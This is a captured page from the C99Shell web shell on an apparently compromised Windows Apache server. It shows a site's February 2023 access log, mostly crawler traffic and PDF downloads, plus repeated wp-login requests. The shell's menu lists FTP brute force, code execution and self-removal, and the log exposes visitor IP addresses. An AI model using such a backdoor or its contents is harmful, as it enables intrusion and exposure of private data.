!C99Shell v. 1.0 pre-release build #13!

Software: Apache. PHP/5.5.15 

uname -a: Windows NT SVR-DMZ 6.1 build 7600 (Windows Server 2008 R2 Enterprise Edition) i586 

SYSTEM 

Safe-mode: OFF (not secure)

E:\nuevo\apache\logs\   drwxrwxrwx
Free 9.41 GB of 239.26 GB (3.93%)
Detected drives: [ a ] [ c ] [ d ] [ e ] [ f ]
Home    Back    Forward    UPDIR    Refresh    Search    Buffer    Encoder    Tools    Proc.    FTP brute    Sec.    SQL    PHP-code    Update    Feedback    Self remove    Logout    


Viewing file:     access.2023.02.05.log (3.46 MB)      -rw-rw-rw-
Select action/file-type:
(+) | (+) | (+) | Code (+) | Session (+) | (+) | SDB (+) | (+) | (+) | (+) | (+) | (+) |
216.245.221.92 - - [05/Feb/2023:00:00:06 -0500] "HEAD / HTTP/1.1" 200 -
66.249.79.107 - - [05/Feb/2023:00:00:48 -0500] "-" 408 -
52.167.144.97 - - [05/Feb/2023:00:02:12 -0500] "GET /bla/resoluciones/autos%202021/5781.pdf HTTP/1.1" 200 353060
157.55.39.41 - - [05/Feb/2023:00:02:37 -0500] "GET /participa-en-las-actividades-del-dia-mundial-de-humedales.html HTTP/1.1" 200 874
157.55.39.142 - - [05/Feb/2023:00:02:59 -0500] "GET /bla/resoluciones/resoluciones%202022/2842.pdf HTTP/1.1" 200 383040
185.119.81.103 - - [05/Feb/2023:00:03:27 -0500] "GET /portaldeninos/wp-login.php HTTP/1.1" 200 2592
185.119.81.103 - - [05/Feb/2023:00:03:28 -0500] "POST /portaldeninos/wp-login.php HTTP/1.1" 200 3605
172.22.2.4 - - [05/Feb/2023:00:02:14 -0500] "HEAD /BLA/boletinlegal/ HTTP/1.1" 200 -
201.245.192.253 - - [05/Feb/2023:00:03:57 -0500] "POST /kwsrmcab/Wsrmcab  HTTP/1.1" 200 213
128.14.209.162 - - [05/Feb/2023:00:04:18 -0500] "GET /portaldeninos/ HTTP/1.1" 200 110197
69.171.251.7 - - [05/Feb/2023:00:04:42 -0500] "GET /images/2%20de%20febrero%20liberaci\xc3\xb3n%20Tunjo.jpeg HTTP/1.1" 404 1034
172.22.2.4 - - [05/Feb/2023:00:03:05 -0500] "GET /BLA/boletinlegal/ HTTP/1.1" 200 56474
5.255.253.177 - - [05/Feb/2023:00:04:56 -0500] "-" 408 -
216.245.221.92 - - [05/Feb/2023:00:05:06 -0500] "HEAD / HTTP/1.1" 200 -
40.77.167.234 - - [05/Feb/2023:00:06:48 -0500] "GET /bla/resoluciones/autos%202021/5612.pdf HTTP/1.1" 200 368221
173.252.83.118 - - [05/Feb/2023:00:07:46 -0500] "GET /images/1%20de%20febrero%20D\xc3\xada%20sin%20carro.jpeg HTTP/1.1" 404 1034
66.249.79.107 - - [05/Feb/2023:00:07:50 -0500] "-" 408 -
186.29.181.171 - - [05/Feb/2023:00:08:50 -0500] "GET /BLA/resoluciones/AUTOS%202021/4317.pdf HTTP/1.1" 200 428002
186.29.181.171 - - [05/Feb/2023:00:08:53 -0500] "GET /BLA/resoluciones/AUTOS%202021/4316.pdf HTTP/1.1" 200 957888
186.29.181.171 - - [05/Feb/2023:00:08:55 -0500] "GET /BLA/resoluciones/AUTOS%202021/4291.pdf HTTP/1.1" 200 336803
186.29.181.171 - - [05/Feb/2023:00:08:57 -0500] "GET /BLA/resoluciones/AUTOS%202021/4289.pdf HTTP/1.1" 200 339818
201.245.192.253 - - [05/Feb/2023:00:08:56 -0500] "POST /kwsrmcab/Wsrmcab  HTTP/1.1" 200 213
186.29.181.171 - - [05/Feb/2023:00:08:59 -0500] "GET /BLA/resoluciones/AUTOS%202021/4280.pdf HTTP/1.1" 200 405751
186.29.181.171 - - [05/Feb/2023:00:09:03 -0500] "GET /BLA/resoluciones/AUTOS%202021/4279.pdf HTTP/1.1" 200 546485
186.29.181.171 - - [05/Feb/2023:00:09:05 -0500] "GET /BLA/resoluciones/AUTOS%202021/4278.pdf HTTP/1.1" 200 402693
186.29.181.171 - - [05/Feb/2023:00:09:10 -0500] "GET /BLA/resoluciones/AUTOS%202021/4277.pdf HTTP/1.1" 200 367152
186.29.181.171 - - [05/Feb/2023:00:09:13 -0500] "GET /BLA/resoluciones/AUTOS%202021/4276.pdf HTTP/1.1" 200 501037
186.29.181.171 - - [05/Feb/2023:00:09:19 -0500] "GET /BLA/resoluciones/AUTOS%202021/4271.pdf HTTP/1.1" 200 1157087
186.29.181.171 - - [05/Feb/2023:00:09:21 -0500] "GET /BLA/resoluciones/AUTOS%202021/4270.pdf HTTP/1.1" 200 1567170
186.29.181.171 - - [05/Feb/2023:00:09:23 -0500] "GET /BLA/resoluciones/AUTOS%202021/4265.pdf HTTP/1.1" 200 336664
186.29.181.171 - - [05/Feb/2023:00:09:25 -0500] "GET /BLA/resoluciones/AUTOS%202021/4261.pdf HTTP/1.1" 200 336452
186.29.181.171 - - [05/Feb/2023:00:09:27 -0500] "GET /BLA/resoluciones/AUTOS%202021/4260.pdf HTTP/1.1" 200 350458
186.29.181.171 - - [05/Feb/2023:00:09:29 -0500] "GET /BLA/resoluciones/AUTOS%202021/4259.pdf HTTP/1.1" 200 351570
186.29.181.171 - - [05/Feb/2023:00:09:31 -0500] "GET /BLA/resoluciones/AUTOS%202021/4258.pdf HTTP/1.1" 200 412164
186.29.181.171 - - [05/Feb/2023:00:09:33 -0500] "GET /BLA/resoluciones/AUTOS%202021/4257.pdf HTTP/1.1" 200 421968
186.29.181.171 - - [05/Feb/2023:00:09:35 -0500] "GET /BLA/resoluciones/AUTOS%202021/4256.pdf HTTP/1.1" 200 346231
172.22.2.4 - - [05/Feb/2023:00:08:04 -0500] "HEAD /BLA/boletinlegal/ HTTP/1.1" 200 -
216.245.221.92 - - [05/Feb/2023:00:10:06 -0500] "HEAD / HTTP/1.1" 200 -
186.29.181.171 - - [05/Feb/2023:00:10:12 -0500] "GET /BLA/resoluciones/AUTOS%202021/4255.pdf HTTP/1.1" 200 3216869
186.29.181.171 - - [05/Feb/2023:00:10:14 -0500] "GET /BLA/resoluciones/AUTOS%202021/4254.pdf HTTP/1.1" 200 336255
186.29.181.171 - - [05/Feb/2023:00:10:16 -0500] "GET /BLA/resoluciones/AUTOS%202021/4251.pdf HTTP/1.1" 200 691269
186.29.181.171 - - [05/Feb/2023:00:10:20 -0500] "GET /BLA/resoluciones/AUTOS%202021/4249.pdf HTTP/1.1" 200 967000
186.29.181.171 - - [05/Feb/2023:00:10:22 -0500] "GET /BLA/resoluciones/AUTOS%202021/4248.pdf HTTP/1.1" 200 403201
186.29.181.171 - - [05/Feb/2023:00:10:24 -0500] "GET /BLA/resoluciones/AUTOS%202021/4247.pdf HTTP/1.1" 200 775026
186.29.181.171 - - [05/Feb/2023:00:10:26 -0500] "GET /BLA/resoluciones/AUTOS%202021/4246.pdf HTTP/1.1" 200 773511
186.29.181.171 - - [05/Feb/2023:00:10:28 -0500] "GET /BLA/resoluciones/AUTOS%202021/4245.pdf HTTP/1.1" 200 376515
186.29.181.171 - - [05/Feb/2023:00:10:31 -0500] "GET /BLA/resoluciones/AUTOS%202021/4243.pdf HTTP/1.1" 200 411082
172.22.2.4 - - [05/Feb/2023:00:08:55 -0500] "GET /BLA/boletinlegal/ HTTP/1.1" 200 59035
186.29.181.171 - - [05/Feb/2023:00:10:38 -0500] "GET /BLA/resoluciones/AUTOS%202021/4240.pdf HTTP/1.1" 200 449019
186.29.181.171 - - [05/Feb/2023:00:10:41 -0500] "GET /BLA/resoluciones/AUTOS%202021/4239.pdf HTTP/1.1" 200 784293
186.29.181.171 - - [05/Feb/2023:00:10:43 -0500] "GET /BLA/resoluciones/AUTOS%202021/4238.pdf HTTP/1.1" 200 409594
186.29.181.171 - - [05/Feb/2023:00:10:46 -0500] "GET /BLA/resoluciones/AUTOS%202021/4235.pdf HTTP/1.1" 200 344649
186.29.181.171 - - [05/Feb/2023:00:10:48 -0500] "GET /BLA/resoluciones/AUTOS%202021/4233.pdf HTTP/1.1" 200 416053
186.29.181.171 - - [05/Feb/2023:00:10:50 -0500] "GET /BLA/resoluciones/AUTOS%202021/4232.pdf HTTP/1.1" 200 363333
186.29.181.171 - - [05/Feb/2023:00:10:53 -0500] "GET /BLA/resoluciones/AUTOS%202021/4231.pdf HTTP/1.1" 200 367186
186.29.181.171 - - [05/Feb/2023:00:10:54 -0500] "GET /BLA/resoluciones/AUTOS%202021/4230.pdf HTTP/1.1" 200 365377
186.29.181.171 - - [05/Feb/2023:00:10:58 -0500] "GET /BLA/resoluciones/AUTOS%202021/4229.pdf HTTP/1.1" 200 375203
186.29.181.171 - - [05/Feb/2023:00:11:01 -0500] "GET /BLA/resoluciones/AUTOS%202021/4226.pdf HTTP/1.1" 200 395694
186.29.181.171 - - [05/Feb/2023:00:11:03 -0500] "GET /BLA/resoluciones/AUTOS%202021/4224.pdf HTTP/1.1" 200 353840
157.55.39.117 - - [05/Feb/2023:00:12:37 -0500] "GET /BLA/resoluciones/AUTOS%202021/4233.pdf HTTP/1.1" 200 416053
157.55.39.142 - - [05/Feb/2023:00:12:39 -0500] "GET /BLA/resoluciones/AUTOS%202021/4256.pdf HTTP/1.1" 200 346231
52.167.144.97 - - [05/Feb/2023:00:12:40 -0500] "GET /BLA/resoluciones/AUTOS%202021/4229.pdf HTTP/1.1" 200 375203
52.167.144.49 - - [05/Feb/2023:00:12:42 -0500] "GET /BLA/resoluciones/AUTOS%202021/4278.pdf HTTP/1.1" 200 402693
157.55.39.117 - - [05/Feb/2023:00:12:44 -0500] "GET /BLA/resoluciones/AUTOS%202021/4317.pdf HTTP/1.1" 200 428002
40.77.167.234 - - [05/Feb/2023:00:12:45 -0500] "GET /BLA/resoluciones/AUTOS%202021/4280.pdf HTTP/1.1" 200 405751
157.55.39.142 - - [05/Feb/2023:00:12:51 -0500] "GET /BLA/resoluciones/AUTOS%202021/4231.pdf HTTP/1.1" 200 367186
40.77.167.234 - - [05/Feb/2023:00:12:52 -0500] "GET /BLA/resoluciones/AUTOS%202021/4276.pdf HTTP/1.1" 200 501037
157.55.39.117 - - [05/Feb/2023:00:12:53 -0500] "GET /BLA/resoluciones/AUTOS%202021/4289.pdf HTTP/1.1" 200 339818
52.167.144.49 - - [05/Feb/2023:00:12:55 -0500] "GET /BLA/resoluciones/AUTOS%202021/4248.pdf HTTP/1.1" 200 403201
157.55.39.142 - - [05/Feb/2023:00:12:58 -0500] "GET /BLA/resoluciones/AUTOS%202021/4238.pdf HTTP/1.1" 200 409594
52.167.144.97 - - [05/Feb/2023:00:13:00 -0500] "GET /BLA/resoluciones/AUTOS%202021/4316.pdf HTTP/1.1" 200 957888
40.77.167.251 - - [05/Feb/2023:00:13:06 -0500] "GET /BLA/resoluciones/AUTOS%202021/4235.pdf HTTP/1.1" 200 344649
52.167.144.97 - - [05/Feb/2023:00:13:08 -0500] "GET /BLA/resoluciones/AUTOS%202021/4277.pdf HTTP/1.1" 200 367152
157.55.39.142 - - [05/Feb/2023:00:13:09 -0500] "GET /BLA/resoluciones/AUTOS%202021/4259.pdf HTTP/1.1" 200 351570
40.77.167.234 - - [05/Feb/2023:00:13:11 -0500] "GET /BLA/resoluciones/AUTOS%202021/4240.pdf HTTP/1.1" 200 449019
40.77.167.251 - - [05/Feb/2023:00:13:12 -0500] "GET /BLA/resoluciones/AUTOS%202021/4258.pdf HTTP/1.1" 200 412164
186.29.181.171 - - [05/Feb/2023:00:13:13 -0500] "GET /BLA/resoluciones/AUTOS%202021/4223.pdf HTTP/1.1" 200 346367
186.29.181.171 - - [05/Feb/2023:00:13:15 -0500] "GET /BLA/resoluciones/AUTOS%202021/4222.pdf HTTP/1.1" 200 418254
52.167.144.49 - - [05/Feb/2023:00:13:16 -0500] "GET /BLA/resoluciones/AUTOS%202021/4265.pdf HTTP/1.1" 200 336664
186.29.181.171 - - [05/Feb/2023:00:13:17 -0500] "GET /BLA/resoluciones/AUTOS%202021/4221.pdf HTTP/1.1" 200 354698
40.77.167.234 - - [05/Feb/2023:00:13:18 -0500] "GET /BLA/resoluciones/AUTOS%202021/4246.pdf HTTP/1.1" 200 773511
52.167.144.97 - - [05/Feb/2023:00:13:20 -0500] "GET /BLA/resoluciones/AUTOS%202021/4247.pdf HTTP/1.1" 200 775026
186.29.181.171 - - [05/Feb/2023:00:13:20 -0500] "GET /BLA/resoluciones/AUTOS%202021/4220.pdf HTTP/1.1" 200 348330
157.55.39.117 - - [05/Feb/2023:00:13:21 -0500] "GET /BLA/resoluciones/AUTOS%202021/4270.pdf HTTP/1.1" 200 1567170
186.29.181.171 - - [05/Feb/2023:00:13:22 -0500] "GET /BLA/resoluciones/AUTOS%202021/4219.pdf HTTP/1.1" 200 1147707
157.55.39.117 - - [05/Feb/2023:00:13:24 -0500] "GET /BLA/resoluciones/AUTOS%202021/4245.pdf HTTP/1.1" 200 376515
186.29.181.171 - - [05/Feb/2023:00:13:24 -0500] "GET /BLA/resoluciones/AUTOS%202021/4218.pdf HTTP/1.1" 200 381982
186.29.181.171 - - [05/Feb/2023:00:13:26 -0500] "GET /BLA/resoluciones/AUTOS%202021/4217.pdf HTTP/1.1" 200 403333
40.77.167.251 - - [05/Feb/2023:00:13:27 -0500] "GET /BLA/resoluciones/AUTOS%202021/4291.pdf HTTP/1.1" 200 336803
186.29.181.171 - - [05/Feb/2023:00:13:28 -0500] "GET /BLA/resoluciones/AUTOS%202021/4216.pdf HTTP/1.1" 200 392168
186.29.181.171 - - [05/Feb/2023:00:13:30 -0500] "GET /BLA/resoluciones/AUTOS%202021/4213.pdf HTTP/1.1" 200 343789
157.55.39.117 - - [05/Feb/2023:00:13:31 -0500] "GET /BLA/resoluciones/AUTOS%202021/4257.pdf HTTP/1.1" 200 421968
157.55.39.142 - - [05/Feb/2023:00:13:32 -0500] "GET /BLA/resoluciones/AUTOS%202021/4232.pdf HTTP/1.1" 200 363333
186.29.181.171 - - [05/Feb/2023:00:13:32 -0500] "GET /BLA/resoluciones/AUTOS%202021/4212.pdf HTTP/1.1" 200 348136
186.29.181.171 - - [05/Feb/2023:00:13:34 -0500] "GET /BLA/resoluciones/AUTOS%202021/4211.pdf HTTP/1.1" 200 351366
40.77.167.251 - - [05/Feb/2023:00:13:34 -0500] "GET /BLA/resoluciones/AUTOS%202021/4230.pdf HTTP/1.1" 200 365377
40.77.167.234 - - [05/Feb/2023:00:13:37 -0500] "GET /BLA/resoluciones/AUTOS%202021/4261.pdf HTTP/1.1" 200 336452
186.29.181.171 - - [05/Feb/2023:00:13:40 -0500] "GET /BLA/resoluciones/AUTOS%202021/4210.pdf HTTP/1.1" 200 378883
52.167.144.97 - - [05/Feb/2023:00:13:42 -0500] "GET /BLA/resoluciones/AUTOS%202021/4255.pdf HTTP/1.1" 200 3216869
186.29.181.171 - - [05/Feb/2023:00:13:43 -0500] "GET /BLA/resoluciones/AUTOS%202021/4208.pdf HTTP/1.1" 200 416861
52.167.144.97 - - [05/Feb/2023:00:13:44 -0500] "GET /BLA/resoluciones/AUTOS%202021/4260.pdf HTTP/1.1" 200 350458
186.29.181.171 - - [05/Feb/2023:00:13:45 -0500] "GET /BLA/resoluciones/AUTOS%202021/4207.pdf HTTP/1.1" 200 400184
186.29.181.171 - - [05/Feb/2023:00:13:47 -0500] "GET /BLA/resoluciones/AUTOS%202021/4202.pdf HTTP/1.1" 200 396057
157.55.39.117 - - [05/Feb/2023:00:13:47 -0500] "GET /BLA/resoluciones/AUTOS%202021/4251.pdf HTTP/1.1" 200 691269
40.77.167.251 - - [05/Feb/2023:00:13:48 -0500] "GET /BLA/resoluciones/AUTOS%202021/4243.pdf HTTP/1.1" 200 411082
186.29.181.171 - - [05/Feb/2023:00:13:49 -0500] "GET /BLA/resoluciones/AUTOS%202021/4196.pdf HTTP/1.1" 200 497448
186.29.181.171 - - [05/Feb/2023:00:13:51 -0500] "GET /BLA/resoluciones/AUTOS%202021/4190.pdf HTTP/1.1" 200 351556
186.29.181.171 - - [05/Feb/2023:00:13:53 -0500] "GET /BLA/resoluciones/AUTOS%202021/4184.pdf HTTP/1.1" 200 355296
40.77.167.251 - - [05/Feb/2023:00:13:55 -0500] "GET /BLA/resoluciones/AUTOS%202021/4279.pdf HTTP/1.1" 200 546485
186.29.181.171 - - [05/Feb/2023:00:13:55 -0500] "GET /BLA/resoluciones/AUTOS%202021/4182.pdf HTTP/1.1" 200 359696
201.245.192.253 - - [05/Feb/2023:00:13:54 -0500] "POST /kwsrmcab/Wsrmcab  HTTP/1.1" 200 213
157.55.39.117 - - [05/Feb/2023:00:13:57 -0500] "GET /BLA/resoluciones/AUTOS%202021/4249.pdf HTTP/1.1" 200 967000
186.29.181.171 - - [05/Feb/2023:00:13:58 -0500] "GET /BLA/resoluciones/AUTOS%202021/4181.pdf HTTP/1.1" 200 351166
186.29.181.171 - - [05/Feb/2023:00:14:00 -0500] "GET /BLA/resoluciones/AUTOS%202021/4180.pdf HTTP/1.1" 200 350081
157.55.39.117 - - [05/Feb/2023:00:14:05 -0500] "GET /BLA/resoluciones/AUTOS%202021/4239.pdf HTTP/1.1" 200 784293
40.77.167.251 - - [05/Feb/2023:00:14:13 -0500] "GET /BLA/resoluciones/AUTOS%202021/4254.pdf HTTP/1.1" 200 336255
157.55.39.142 - - [05/Feb/2023:00:14:50 -0500] "GET /bla/resoluciones/autos%202021/5124.pdf HTTP/1.1" 200 395812
216.245.221.92 - - [05/Feb/2023:00:15:06 -0500] "HEAD / HTTP/1.1" 200 -
20.191.45.212 - - [05/Feb/2023:00:15:12 -0500] "GET / HTTP/1.1" 200 319
20.191.45.212 - - [05/Feb/2023:00:15:12 -0500] "GET /favicon.ico HTTP/1.1" 200 7782
186.29.181.171 - - [05/Feb/2023:00:15:22 -0500] "GET /BLA/resoluciones/AUTOS%202021/4177.pdf HTTP/1.1" 200 390224
186.29.181.171 - - [05/Feb/2023:00:15:24 -0500] "GET /BLA/resoluciones/AUTOS%202021/4173.pdf HTTP/1.1" 200 350738
186.29.181.171 - - [05/Feb/2023:00:15:26 -0500] "GET /BLA/resoluciones/AUTOS%202021/4172.pdf HTTP/1.1" 200 351338
186.29.181.171 - - [05/Feb/2023:00:15:28 -0500] "GET /BLA/resoluciones/AUTOS%202021/4171.pdf HTTP/1.1" 200 350056
186.29.181.171 - - [05/Feb/2023:00:15:30 -0500] "GET /BLA/resoluciones/AUTOS%202021/4170.pdf HTTP/1.1" 200 350522
186.29.181.171 - - [05/Feb/2023:00:15:32 -0500] "GET /BLA/resoluciones/AUTOS%202021/4169.pdf HTTP/1.1" 200 352156
186.29.181.171 - - [05/Feb/2023:00:15:34 -0500] "GET /BLA/resoluciones/AUTOS%202021/4163.pdf HTTP/1.1" 200 378149
172.22.2.4 - - [05/Feb/2023:00:13:54 -0500] "HEAD /BLA/boletinlegal/ HTTP/1.1" 200 -
186.29.181.171 - - [05/Feb/2023:00:15:38 -0500] "GET /BLA/resoluciones/AUTOS%202021/4162.pdf HTTP/1.1" 200 349303
186.29.181.171 - - [05/Feb/2023:00:15:40 -0500] "GET /BLA/resoluciones/AUTOS%202021/4161.pdf HTTP/1.1" 200 350057
186.29.181.171 - - [05/Feb/2023:00:15:42 -0500] "GET /BLA/resoluciones/AUTOS%202021/4160.pdf HTTP/1.1" 200 350376
186.29.181.171 - - [05/Feb/2023:00:15:44 -0500] "GET /BLA/resoluciones/AUTOS%202021/4159.pdf HTTP/1.1" 200 349714
5.45.207.123 - - [05/Feb/2023:00:15:57 -0500] "-" 408 -
157.55.39.142 - - [05/Feb/2023:00:15:59 -0500] "GET /bla/resoluciones/resoluciones%202022/0042.pdf HTTP/1.1" 304 -
186.29.181.171 - - [05/Feb/2023:00:16:09 -0500] "GET /BLA/resoluciones/AUTOS%202021/4158.pdf HTTP/1.1" 200 363303
186.29.181.171 - - [05/Feb/2023:00:16:12 -0500] "GET /BLA/resoluciones/AUTOS%202021/4157.pdf HTTP/1.1" 200 350491
186.29.181.171 - - [05/Feb/2023:00:16:14 -0500] "GET /BLA/resoluciones/AUTOS%202021/4156.pdf HTTP/1.1" 200 349568
186.29.181.171 - - [05/Feb/2023:00:16:16 -0500] "GET /BLA/resoluciones/AUTOS%202021/4155.pdf HTTP/1.1" 200 351402
186.29.181.171 - - [05/Feb/2023:00:16:18 -0500] "GET /BLA/resoluciones/AUTOS%202021/4154.pdf HTTP/1.1" 200 350621
186.29.181.171 - - [05/Feb/2023:00:16:20 -0500] "GET /BLA/resoluciones/AUTOS%202021/4153.pdf HTTP/1.1" 200 350134
186.29.181.171 - - [05/Feb/2023:00:16:22 -0500] "GET /BLA/resoluciones/AUTOS%202021/4152.pdf HTTP/1.1" 200 390904
186.29.181.171 - - [05/Feb/2023:00:16:24 -0500] "GET /BLA/resoluciones/AUTOS%202021/4151.pdf HTTP/1.1" 200 407605
172.22.2.4 - - [05/Feb/2023:00:14:45 -0500] "GET /BLA/boletinlegal/ HTTP/1.1" 200 59035
186.29.181.171 - - [05/Feb/2023:00:16:26 -0500] "GET /BLA/resoluciones/AUTOS%202021/4150.pdf HTTP/1.1" 200 352508
186.29.181.171 - - [05/Feb/2023:00:16:28 -0500] "GET /BLA/resoluciones/AUTOS%202021/4149.pdf HTTP/1.1" 200 353572
186.29.181.171 - - [05/Feb/2023:00:16:35 -0500] "GET /BLA/resoluciones/AUTOS%202021/4148.pdf HTTP/1.1" 200 350849
186.29.181.171 - - [05/Feb/2023:00:16:38 -0500] "GET /BLA/resoluciones/AUTOS%202021/4147.pdf HTTP/1.1" 200 402177
186.29.181.171 - - [05/Feb/2023:00:16:40 -0500] "GET /BLA/resoluciones/AUTOS%202021/4146.pdf HTTP/1.1" 200 353875
186.29.181.171 - - [05/Feb/2023:00:16:42 -0500] "GET /BLA/resoluciones/AUTOS%202021/4145.pdf HTTP/1.1" 200 353611
186.29.181.171 - - [05/Feb/2023:00:16:43 -0500] "GET /BLA/resoluciones/AUTOS%202021/4143.pdf HTTP/1.1" 200 360056
186.29.181.171 - - [05/Feb/2023:00:16:47 -0500] "GET /BLA/resoluciones/AUTOS%202021/4141.pdf HTTP/1.1" 200 609049
186.29.181.171 - - [05/Feb/2023:00:16:49 -0500] "GET /BLA/resoluciones/AUTOS%202021/4140.pdf HTTP/1.1" 200 386277
186.29.181.171 - - [05/Feb/2023:00:16:51 -0500] "GET /BLA/resoluciones/AUTOS%202021/4139.pdf HTTP/1.1" 200 403797
186.29.181.171 - - [05/Feb/2023:00:16:53 -0500] "GET /BLA/resoluciones/AUTOS%202021/4138.pdf HTTP/1.1" 200 389653
186.29.181.171 - - [05/Feb/2023:00:16:55 -0500] "GET /BLA/resoluciones/AUTOS%202021/4137.pdf HTTP/1.1" 200 350234
186.29.181.171 - - [05/Feb/2023:00:16:57 -0500] "GET /BLA/resoluciones/AUTOS%202021/4135.pdf HTTP/1.1" 200 504985
66.249.79.107 - - [05/Feb/2023:00:17:32 -0500] "-" 408 -
201.245.192.253 - - [05/Feb/2023:00:18:51 -0500] "POST /kwsrmcab/Wsrmcab HTTP/1.1" 200 39188
201.245.192.253 - - [05/Feb/2023:00:18:53 -0500] "POST /kwsrmcab/Wsrmcab  HTTP/1.1" 200 213
201.245.192.253 - - [05/Feb/2023:00:18:56 -0500] "POST /kwsrmcab/Wsrmcab HTTP/1.1" 200 42671
186.29.181.171 - - [05/Feb/2023:00:19:20 -0500] "GET /BLA/resoluciones/AUTOS%202021/4134.pdf HTTP/1.1" 200 645709
186.29.181.171 - - [05/Feb/2023:00:19:22 -0500] "GET /BLA/resoluciones/AUTOS%202021/4133.pdf HTTP/1.1" 200 754499
186.29.181.171 - - [05/Feb/2023:00:19:24 -0500] "GET /BLA/resoluciones/AUTOS%202021/4132.pdf HTTP/1.1" 200 403186
186.29.181.171 - - [05/Feb/2023:00:19:27 -0500] "GET /BLA/resoluciones/AUTOS%202021/4131.pdf HTTP/1.1" 200 607945
186.29.181.171 - - [05/Feb/2023:00:19:29 -0500] "GET /BLA/resoluciones/AUTOS%202021/4130.pdf HTTP/1.1" 200 527591
186.29.181.171 - - [05/Feb/2023:00:19:31 -0500] "GET /BLA/resoluciones/AUTOS%202021/4129.pdf HTTP/1.1" 200 400547
186.29.181.171 - - [05/Feb/2023:00:19:33 -0500] "GET /BLA/resoluciones/AUTOS%202021/4128.pdf HTTP/1.1" 200 456583
186.29.181.171 - - [05/Feb/2023:00:19:35 -0500] "GET /BLA/resoluciones/AUTOS%202021/4127.pdf HTTP/1.1" 200 530996
186.29.181.171 - - [05/Feb/2023:00:19:38 -0500] "GET /BLA/resoluciones/AUTOS%202021/4125.pdf HTTP/1.1" 200 306667
186.29.181.171 - - [05/Feb/2023:00:19:40 -0500] "GET /BLA/resoluciones/AUTOS%202021/4124.pdf HTTP/1.1" 200 351931
186.29.181.171 - - [05/Feb/2023:00:19:43 -0500] "GET /BLA/resoluciones/AUTOS%202021/4114.pdf HTTP/1.1" 200 381115
186.29.181.171 - - [05/Feb/2023:00:19:51 -0500] "GET /BLA/resoluciones/AUTOS%202021/4113.pdf HTTP/1.1" 200 400433
186.29.181.171 - - [05/Feb/2023:00:19:53 -0500] "GET /BLA/resoluciones/AUTOS%202021/4112.pdf HTTP/1.1" 200 384904
186.29.181.171 - - [05/Feb/2023:00:19:55 -0500] "GET /BLA/resoluciones/AUTOS%202021/4111.pdf HTTP/1.1" 200 378642
186.29.181.171 - - [05/Feb/2023:00:19:57 -0500] "GET /BLA/resoluciones/AUTOS%202021/4106.pdf HTTP/1.1" 200 403893
186.29.181.171 - - [05/Feb/2023:00:19:59 -0500] "GET /BLA/resoluciones/AUTOS%202021/4105.pdf HTTP/1.1" 200 398631
186.29.181.171 - - [05/Feb/2023:00:20:01 -0500] "GET /BLA/resoluciones/AUTOS%202021/4104.pdf HTTP/1.1" 200 410314
186.29.181.171 - - [05/Feb/2023:00:20:03 -0500] "GET /BLA/resoluciones/AUTOS%202021/4103.pdf HTTP/1.1" 200 398938
186.29.181.171 - - [05/Feb/2023:00:20:05 -0500] "GET /BLA/resoluciones/AUTOS%202021/4100.pdf HTTP/1.1" 200 383130
216.245.221.92 - - [05/Feb/2023:00:20:06 -0500] "HEAD / HTTP/1.1" 200 -
186.29.181.171 - - [05/Feb/2023:00:20:07 -0500] "GET /BLA/resoluciones/AUTOS%202021/4099.pdf HTTP/1.1" 200 387580
186.29.181.171 - - [05/Feb/2023:00:20:09 -0500] "GET /BLA/resoluciones/AUTOS%202021/4096.pdf HTTP/1.1" 200 4914490
185.119.81.105 - - [05/Feb/2023:00:20:27 -0500] "GET /portaldeninos/wp-login.php HTTP/1.1" 200 2592
185.119.81.105 - - [05/Feb/2023:00:20:28 -0500] "POST /portaldeninos/wp-login.php HTTP/1.1" 200 3650
117.220.72.12 - - [05/Feb/2023:00:20:33 -0500] "GET / HTTP/1.1" 200 319
172.22.2.4 - - [05/Feb/2023:00:19:44 -0500] "HEAD /BLA/boletinlegal/ HTTP/1.1" 200 -
157.55.39.142 - - [05/Feb/2023:00:21:40 -0500] "GET /bla/resoluciones/resoluciones%202022/4609.pdf HTTP/1.1" 200 1805225
79.110.73.6 - - [05/Feb/2023:00:21:50 -0500] "GET /BLA/resoluciones/RESOLUCIONES%202014/1016.pdf HTTP/1.1" 200 431810
172.22.2.4 - - [05/Feb/2023:00:20:35 -0500] "GET /BLA/boletinlegal/ HTTP/1.1" 200 59404
157.55.39.142 - - [05/Feb/2023:00:22:50 -0500] "GET /bla/resoluciones/autos%202021/5268.pdf HTTP/1.1" 200 383795
66.249.79.107 - - [05/Feb/2023:00:23:27 -0500] "-" 408 -
201.245.192.253 - - [05/Feb/2023:00:23:52 -0500] "POST /kwsrmcab/Wsrmcab  HTTP/1.1" 200 213
216.245.221.92 - - [05/Feb/2023:00:25:06 -0500] "HEAD / HTTP/1.1" 200 -
69.171.249.15 - - [05/Feb/2023:00:25:17 -0500] "GET /images/2%20de%20febrero%20liberaci\xc3\xb3n%20Tunjo.jpeg HTTP/1.1" 404 1034
185.119.81.105 - - [05/Feb/2023:00:25:37 -0500] "GET /portaldeninos/wp-login.php HTTP/1.1" 200 2592
185.119.81.105 - - [05/Feb/2023:00:25:38 -0500] "POST /portaldeninos/wp-login.php HTTP/1.1" 200 3605
186.29.181.171 - - [05/Feb/2023:00:25:44 -0500] "GET /BLA/resoluciones/AUTOS%202021/4094.pdf HTTP/1.1" 200 411781
186.29.181.171 - - [05/Feb/2023:00:25:46 -0500] "GET /BLA/resoluciones/AUTOS%202021/4092.pdf HTTP/1.1" 200 523057
186.29.181.171 - - [05/Feb/2023:00:25:50 -0500] "GET /BLA/resoluciones/AUTOS%202021/4091.pdf HTTP/1.1" 200 368266
186.29.181.171 - - [05/Feb/2023:00:25:52 -0500] "GET /BLA/resoluciones/AUTOS%202021/4090.pdf HTTP/1.1" 200 633569
186.29.181.171 - - [05/Feb/2023:00:25:54 -0500] "GET /BLA/resoluciones/AUTOS%202021/4089.pdf HTTP/1.1" 200 453047
186.29.181.171 - - [05/Feb/2023:00:25:56 -0500] "GET /BLA/resoluciones/AUTOS%202021/4087.pdf HTTP/1.1" 200 526807
95.108.213.50 - - [05/Feb/2023:00:25:57 -0500] "-" 408 -
186.29.181.171 - - [05/Feb/2023:00:25:58 -0500] "GET /BLA/resoluciones/AUTOS%202021/4083.pdf HTTP/1.1" 200 356884
186.29.181.171 - - [05/Feb/2023:00:26:00 -0500] "GET /BLA/resoluciones/AUTOS%202021/4082.pdf HTTP/1.1" 200 346571
186.29.181.171 - - [05/Feb/2023:00:26:02 -0500] "GET /BLA/resoluciones/AUTOS%202021/4080.pdf HTTP/1.1" 200 407899
